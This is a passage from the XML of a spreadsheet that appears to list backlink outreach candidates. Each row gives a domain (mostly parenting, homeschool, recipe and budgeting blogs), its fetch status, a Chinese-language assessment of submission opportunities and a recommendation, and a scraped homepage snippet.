        <x:v>The Pistachio Project is a journey of becoming green and crunchy (like a pistachio). It's about natural skincare, herbal remedies, real food, and more. The Pistachio Project - The Pistachio Project About About The Pistachio Project Privacy Policy Natural Living Natural Home Green Cleaning Healthy Eating Gardening Homesteading Natural Health &amp; Beauty Natural Health Natural Skincare Natural Remedies Natural Parenting Pregnancy Breastfeeding Cloth Diapering Natural Babies &amp; Kids Homeschooling Car Seat Safety Real Food Recipes Breakfast Main Dishes Side Dishes Snacks Sweets Breads Condiments Beverages Contact Select Page Welcome! I’m Brittany and I’m so glad you are here! Wanting the best for my children, I started on this journey of becoming green and crunchy. I now realize that not only do they need a safe home but that I do also. Curious abo</x:v>
      </x:c>
      <x:c r="R458" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S458" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T458" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://pistachioproject.com</x:v>
      </x:c>
    </x:row>
    <x:row r="459">
      <x:c r="A459" s="18" t="str">
        <x:v>458</x:v>
      </x:c>
      <x:c r="B459" s="19" t="str">
        <x:v>wonderhouseoflittles.com</x:v>
      </x:c>
      <x:c r="C459" s="19" t="str">
        <x:v>https://wonderhouseoflittles.com</x:v>
      </x:c>
      <x:c r="D459" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E459" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F459" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G459" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H459" s="19" t="str">
        <x:v>https://wonderhouseoflittles.com/</x:v>
      </x:c>
      <x:c r="I459" s="19" t="str">
        <x:v>WonderHouse of Littles</x:v>
      </x:c>
      <x:c r="J459" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K459" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L459" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M459" s="19" t="str">
        <x:v>https://wonderhouseoflittles.com/</x:v>
      </x:c>
      <x:c r="N459" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O459" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P459" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q459" s="21" t="str">
        <x:v>WonderHouse of Littles Tap here to get your FREE Montessori-inspired Bedroom Guide WHL About Work With Me Blog Play &amp; Learn Contact WHL About Work With Me Blog Play &amp; Learn Contact Cultivating the Magic of Childhood Create a Peaceful, Connected Home with Montessori &amp; Positive Discipline Set a Strong Foundation for Your Little Ones From the Start Parenting can be overwhelming, but it doesn’t have to be! At WonderHouse of Littles, we provide you with Montessori-inspired and Positive Discipline tools to help you build a nurturing environment where your entire family thrives. Get the support you need to navigate those early years, with actionable tools and strategies that nurture your child’s de</x:v>
      </x:c>
      <x:c r="R459" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S459" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T459" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://wonderhouseoflittles.com</x:v>
      </x:c>
    </x:row>
    <x:row r="460">
      <x:c r="A460" s="18" t="str">
        <x:v>459</x:v>
      </x:c>
      <x:c r="B460" s="19" t="str">
        <x:v>messforless.net</x:v>
      </x:c>
      <x:c r="C460" s="19" t="str">
        <x:v>https://messforless.net</x:v>
      </x:c>
      <x:c r="D460" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E460" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F460" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G460" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H460" s="19" t="str">
        <x:v>https://www.messforless.net/</x:v>
      </x:c>
      <x:c r="I460" s="19" t="str">
        <x:v>Family Friendly Recipes and Kids Activities | Mess for Less</x:v>
      </x:c>
      <x:c r="J460" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K460" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L460" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M460" s="19" t="str">
        <x:v>https://www.messforless.net/</x:v>
      </x:c>
      <x:c r="N460" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O460" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P460" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q460" s="21" t="str">
        <x:v>Easy recipes the family will love. You'll find simple comfort food that doesn't take lots of time to cook. Also recipes for kids to make and kids activities. Family Friendly Recipes and Kids Activities | Mess for Less Mess for Less Crafts Art Winter Activities Spring Activities Summer Activities Fall Recipes and Activities Kids Activities Baby and Toddler Activities Preschool Activities Sensory Activities Fine Motor Skills Activities Learning Activities Science Activities Family Pets Parenting Shop Breakfast Recipes Lunch Recipes Dinner Recipes Dessert Recipes Snack Recipes Appetizers Crock Pot Recipes Cooking with Kids Recipes Spring Activities Kids Shop Subscribe Recipes Spring Activities Kids Shop Subscribe × Family Friendly Recipes and Kids Activities We provide easy recipes that the whole family will love. You'll find simple comfort food tha</x:v>
      </x:c>
      <x:c r="R460" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S460" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T460" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://messforless.net</x:v>
      </x:c>
    </x:row>
    <x:row r="461">
      <x:c r="A461" s="18" t="str">
        <x:v>460</x:v>
      </x:c>
      <x:c r="B461" s="19" t="str">
        <x:v>wixsite.com</x:v>
      </x:c>
      <x:c r="C461" s="19" t="str">
        <x:v>https://wixsite.com</x:v>
      </x:c>
      <x:c r="D461" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E461" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F461" s="20"/>
      <x:c r="G461" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H461" s="19" t="str"/>
      <x:c r="I461" s="19" t="str"/>
      <x:c r="J461" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K461" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L461" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M461" s="19" t="str">
        <x:v>https://wixsite.com</x:v>
      </x:c>
      <x:c r="N461" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O461" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P461" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q461" s="21" t="str"/>
      <x:c r="R461" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S461" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T461" s="21" t="str">
        <x:v>fetch failed | 不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://wixsite.com
http://wixsite.com</x:v>
      </x:c>
    </x:row>
    <x:row r="462">
      <x:c r="A462" s="18" t="str">
        <x:v>461</x:v>
      </x:c>
      <x:c r="B462" s="19" t="str">
        <x:v>livinglowkey.com</x:v>
      </x:c>
      <x:c r="C462" s="19" t="str">
        <x:v>https://livinglowkey.com</x:v>
      </x:c>
      <x:c r="D462" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E462" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F462" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G462" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H462" s="19" t="str">
        <x:v>https://livinglowkey.com/</x:v>
      </x:c>
      <x:c r="I462" s="19" t="str">
        <x:v>Home - Living Low Key</x:v>
      </x:c>
      <x:c r="J462" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K462" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L462" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M462" s="19" t="str">
        <x:v>https://livinglowkey.com/</x:v>
      </x:c>
      <x:c r="N462" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O462" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P462" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q462" s="21" t="str">
        <x:v>Living Low Key is for anyone wanting to learn how to create a budget, save more money, and pay off debt fast!! Join us as we teach you how! Home - Living Low Key Skip to main content Skip to header right navigation Skip to site footer Living Low Key Spending Less, Saving More Menu Save Money FRUGAL LIVING TIPS MONEY CHALLENGES FRUGAL MEALS BEST BUDGET PLANNERS BEST BUDGET APPS Make Money FREE ONLINE JOBS GET PAID TO READ GET PAID TO WORKOUT GET CASH BACK FREE GAME APPS THAT PAY BEST ITEMS TO FLIP WORK FROM HOME START A BLOG FAMILY FINANCE FREE BUDGET PRINTABLES FREE DEBT TRACKER MANAGE YOUR MONEY 7 BABY STEPS SHOP CONTACT US About Us ADVERTISE WITH US DISCLAIMER POLICY Privacy Policy TERMS OF USE CALIFORNIA CONSUMER PRIVACY ACT POLICY Welcome to Living Low Key! Start your journey to financial freedom with our FREE Budget Binder!</x:v>
      </x:c>
      <x:c r="R462" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S462" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T462" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://livinglowkey.com</x:v>
      </x:c>
    </x:row>
    <x:row r="463">
      <x:c r="A463" s="18" t="str">
        <x:v>462</x:v>
      </x:c>
      <x:c r="B463" s="19" t="str">
        <x:v>makingmommas.com</x:v>
      </x:c>
      <x:c r="C463" s="19" t="str">
        <x:v>https://makingmommas.com</x:v>
      </x:c>
      <x:c r="D463" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E463" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F463" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G463" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H463" s="19" t="str">
        <x:v>https://makingmommas.com/</x:v>
      </x:c>
      <x:c r="I463" s="19" t="str">
        <x:v>Home - Making Mommas</x:v>
      </x:c>
      <x:c r="J463" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K463" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L463" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M463" s="19" t="str">
        <x:v>https://makingmommas.com/</x:v>
      </x:c>
      <x:c r="N463" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O463" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P463" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q463" s="21" t="str">
        <x:v>Home - Making Mommas Skip to content Start Here Motherhood Marriage Family Life Fun Activities Tools Printables About Shop Start Here Motherhood Marriage Family Life Fun Activities Tools Printables About Shop Strong Families Are Built at Home Motherhood is some of the most important work in the world. Here at Making Mommas, we talk about the real work of raising children, strengthening marriages, and building homes filled with connection, traditions, and love. You’ll find encouragement, simple ideas, and practical tools to help you focus on what matters most — your family. Start Here The Latest From Making Mommas 101+ Preschool Activities for Stay-at-Home Moms (That Actually Help) Easy Sprin</x:v>
      </x:c>
      <x:c r="R463" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S463" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T463" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://makingmommas.com</x:v>
      </x:c>
    </x:row>
    <x:row r="464">
      <x:c r="A464" s="18" t="str">
        <x:v>463</x:v>
      </x:c>
      <x:c r="B464" s="19" t="str">
        <x:v>yandex.com.tr</x:v>
      </x:c>
      <x:c r="C464" s="19" t="str">
        <x:v>https://yandex.com.tr</x:v>
      </x:c>
      <x:c r="D464" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E464" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F464" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G464" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H464" s="19" t="str">
        <x:v>https://yandex.com.tr/</x:v>
      </x:c>
      <x:c r="I464" s="19" t="str">
        <x:v>Yandex — hızlı İnternet araması</x:v>
      </x:c>
      <x:c r="J464" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K464" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L464" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M464" s="19" t="str">
        <x:v>https://yandex.com.tr/</x:v>
      </x:c>
      <x:c r="N464" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O464" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P464" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q464" s="21" t="str">
        <x:v>Her şeyi bulun Yandex'te: Siteler, görseller, müzik, ürünler. Gündelik sorularınızdan bilimsel çalışmalara kadar her türlü soruya yanıt bulun. Metin girerek, konuşarak veya görsel yükleyerek arama yapabilirsiniz. Yandex — hızlı İnternet araması Servisler Gündem Alışveriş Yandex AI Finans YaCevap YaÖzet Video Görsel Daha fazla Servisler Oyunlar Çeviri Maps Disk Metrica Hava durumu Mail Görsel Video Tümü Bul AI Modu Bul Türkiye'de şu anda arananlar Trendler Trendler Siyaset Spor Eğlence Ekonomi Toplum Aktüel Teknoloji Türkiye Doğu Akdeniz'de Navtex ilan etti Cem Yılmaz'ın sağlık durumu ve sosyal medya tepkileri Resmi Gazete'de bugün (02.09.2026) ABD, İran'ı yeniden vurdu Tuzlu Kahve 2. fragmanı yayınlandı Altın fiyatları 2 Eylül'de düştü ABD İran'a saldırı başlattı, altın düştü, petrol yükseldi Ankara'da market silahlı kavga Koç Holding Tüpraş'ta hisse satışı 2026 Galatasaray Deniz Gül'ü transfer etti </x:v>
      </x:c>
      <x:c r="R464" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S464" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T464" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://yandex.com.tr</x:v>
      </x:c>
    </x:row>
    <x:row r="465">
      <x:c r="A465" s="18" t="str">
        <x:v>464</x:v>
      </x:c>
      <x:c r="B465" s="19" t="str">
        <x:v>velktech.com</x:v>
      </x:c>
      <x:c r="C465" s="19" t="str">
        <x:v>https://velktech.com</x:v>
      </x:c>
      <x:c r="D465" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E465" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F465" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G465" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H465" s="19" t="str">
        <x:v>https://velktech.com/</x:v>
      </x:c>
      <x:c r="I465" s="19" t="str">
        <x:v>VelkTech &amp;mdash; Coming Soon</x:v>
      </x:c>
      <x:c r="J465" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K465" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L465" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M465" s="19" t="str">
        <x:v>https://velktech.com/</x:v>
      </x:c>
      <x:c r="N465" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O465" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P465" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q465" s="21" t="str">
        <x:v>Signup to be the first to know when we launch. VelkTech &amp;mdash; Coming Soon Is this your website? "&gt; Login to WordPress VelkTech Powered by Bluehost Discover our hosting solutions: Shared Hosting , WordPress Hosting , VPS Hosting , and Dedicated Hosting .</x:v>
      </x:c>
      <x:c r="R465" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S465" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T465" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://velktech.com</x:v>
      </x:c>
    </x:row>
    <x:row r="466">
      <x:c r="A466" s="18" t="str">
        <x:v>465</x:v>
      </x:c>
      <x:c r="B466" s="19" t="str">
        <x:v>homeschoolpreschool.net</x:v>
      </x:c>
      <x:c r="C466" s="19" t="str">
        <x:v>https://homeschoolpreschool.net</x:v>
      </x:c>
      <x:c r="D466" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E466" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F466" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G466" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H466" s="19" t="str">
        <x:v>https://homeschoolpreschool.net/</x:v>
      </x:c>
      <x:c r="I466" s="19" t="str">
        <x:v>Homeschool Preschool - Free Preschool Printables &amp; Activities</x:v>
      </x:c>
      <x:c r="J466" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K466" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L466" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M466" s="19" t="str">
        <x:v>https://homeschoolpreschool.net/</x:v>
      </x:c>
      <x:c r="N466" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O466" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P466" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q466" s="21" t="str">
        <x:v>Find free preschool printables, hands-on learning activities, and teacher-tested crafts designed for easy, play-based learning at home. Homeschool Preschool - Free Preschool Printables &amp; Activities Skip to content ⭐ Bored preschoolers? Join the HP Activity Club ! Home About Me Privacy Policy Store Blog Search by Season Winter Spring Summer Fall Homeschooling Preschool Science Activities and Printables Hands-On Preschool Activities Sequencing Cards and Activities for Preschoolers Printables Free Preschool Printables Book Lists Activities Search Literacy Math Fine Motor Science Browse Popular Topics alphabet counting cut &amp; paste color by code sequencing life cycles Free Preschool Printables Just looking? Start here. Browse our free preschool worksheets and print what you need—no account, no planning, no pressure. Browse Free P</x:v>
      </x:c>
      <x:c r="R466" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S466" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T466" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://homeschoolpreschool.net</x:v>
      </x:c>
    </x:row>
    <x:row r="467">
      <x:c r="A467" s="18" t="str">
        <x:v>466</x:v>
      </x:c>
      <x:c r="B467" s="19" t="str">
        <x:v>foodie-haven.com</x:v>
      </x:c>
      <x:c r="C467" s="19" t="str">
        <x:v>https://foodie-haven.com</x:v>
      </x:c>
      <x:c r="D467" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E467" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F467" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G467" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H467" s="19" t="str">
        <x:v>https://foodie-haven.com/</x:v>
      </x:c>
      <x:c r="I467" s="19" t="str">
        <x:v>Foodie Haven - Foodie Haven</x:v>
      </x:c>
      <x:c r="J467" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K467" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L467" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M467" s="19" t="str">
        <x:v>https://foodie-haven.com/</x:v>
      </x:c>
      <x:c r="N467" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O467" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P467" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q467" s="21" t="str">
        <x:v>Foodie Haven Foodie Haven - Foodie Haven Skip to Content Search Search for: Close Search &amp;times; Foodie Haven Home Meals and Courses Breakfast Desserts Cuisine Dietary Needs Occasion About us Privacy Policy Contact Terms of use Avoid These 20 Risky Picks At Seafood Restaurants A seafood menu can be full of surprises. Some dishes raise concerns about freshness, sourcing, or hidden health risks. Restaurants won&amp;rsquo;t always tell you the whole story, so knowing what to watch out for can mean the difference between a fantastic meal and an unfortunate mistake. Here are 20 dishes you might want to reconsider &amp;hellip; Read More about Avoid These 20 Risky Picks At Seafood Restaurants 20 Creative Spins On Time-</x:v>
      </x:c>
      <x:c r="R467" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S467" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T467" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://foodie-haven.com</x:v>
      </x:c>
    </x:row>
    <x:row r="468">
      <x:c r="A468" s="18" t="str">
        <x:v>467</x:v>
      </x:c>
      <x:c r="B468" s="19" t="str">
        <x:v>webreus.net</x:v>
      </x:c>
      <x:c r="C468" s="19" t="str">
        <x:v>https://webreus.net</x:v>
      </x:c>
      <x:c r="D468" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E468" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F468" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G468" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H468" s="19" t="str">
        <x:v>https://portaal.webreus.nl:8080/</x:v>
      </x:c>
      <x:c r="I468" s="19" t="str">
        <x:v>Webreus Portaal</x:v>
      </x:c>
      <x:c r="J468" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K468" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L468" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M468" s="19" t="str">
        <x:v>https://portaal.webreus.nl:8080/</x:v>
      </x:c>
      <x:c r="N468" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O468" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P468" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q468" s="21" t="str">
        <x:v>Webreus Portaal W Powered by Webreus Functioneel overzicht Welkom in het Webreus Klantportaal. Hieronder vindt u een uitleg van alle beschikbare menu's en functies. Dashboard (startpagina) Overzichtspagina Het dashboard is de startpagina van het portaal. Hier ziet u in één oogopslag de status van uw hosting: schijfruimtegebruik, e-mailquota en andere relevante informatie over uw pakket. E-mail E-mailaccounts → Domain Beheer uw e-maildomeinen. Voeg een domein toe om e-mailadressen voor dat domein aan te maken. Een domein is de basis voor alle e-mailaccounts (bijv. uwbedrijf.nl ). E-mailaccounts → Domain Alias Een domein-alias laat e-mail die naar een alternatief domein wordt gestuurd, aankome</x:v>
      </x:c>
      <x:c r="R468" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S468" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T468" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://webreus.net
http://webreus.net</x:v>
      </x:c>
    </x:row>
    <x:row r="469">
      <x:c r="A469" s="18" t="str">
        <x:v>468</x:v>
      </x:c>
      <x:c r="B469" s="19" t="str">
        <x:v>cookingadventures.blog</x:v>
      </x:c>
      <x:c r="C469" s="19" t="str">
        <x:v>https://cookingadventures.blog</x:v>
      </x:c>
      <x:c r="D469" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E469" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F469" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G469" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H469" s="19" t="str">
        <x:v>https://cookingadventures.blog/</x:v>
      </x:c>
      <x:c r="I469" s="19" t="str">
        <x:v>Cooking Adventures – A home cook explores cultures through food</x:v>
      </x:c>
      <x:c r="J469" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K469" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L469" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M469" s="19" t="str">
        <x:v>https://cookingadventures.blog/</x:v>
      </x:c>
      <x:c r="N469" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O469" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P469" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q469" s="21" t="str">
        <x:v>A home cook explores cultures through food Cooking Adventures – A home cook explores cultures through food Show Show Skip to content Cooking Adventures A home cook explores cultures through food Featured Featured Welcome August 14, 2022 August 25, 2022 Format Post format: Image I cook as a hobby, and I maintain this blog primarily to keep track of recipes that my family has enjoyed over the years. I started blogging back in 2015, in response to requests from friends for recipes they had seen me post on Facebook (but that I couldn't easily catalog). My original blog was&amp;hellip; Continue reading Welcome Sausage and potato soup with spinach August 31, 2026 We tried this recipe as an option for a packed lunch: https://www.skinnytaste.com</x:v>
      </x:c>
      <x:c r="R469" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S469" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T469" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://cookingadventures.blog</x:v>
      </x:c>
    </x:row>
    <x:row r="470">
      <x:c r="A470" s="18" t="str">
        <x:v>469</x:v>
      </x:c>
      <x:c r="B470" s="19" t="str">
        <x:v>rockyourhomeschool.net</x:v>
      </x:c>
      <x:c r="C470" s="19" t="str">
        <x:v>https://rockyourhomeschool.net</x:v>
      </x:c>
      <x:c r="D470" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E470" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F470" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G470" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H470" s="19" t="str">
        <x:v>https://rockyourhomeschool.net/</x:v>
      </x:c>
      <x:c r="I470" s="19" t="str">
        <x:v>Printable Activities for Learning, Holidays, and Fun Days for Kids - Rock Your Homeschool</x:v>
      </x:c>
      <x:c r="J470" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K470" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L470" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M470" s="19" t="str">
        <x:v>https://rockyourhomeschool.net/</x:v>
      </x:c>
      <x:c r="N470" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O470" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P470" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q470" s="21" t="str">
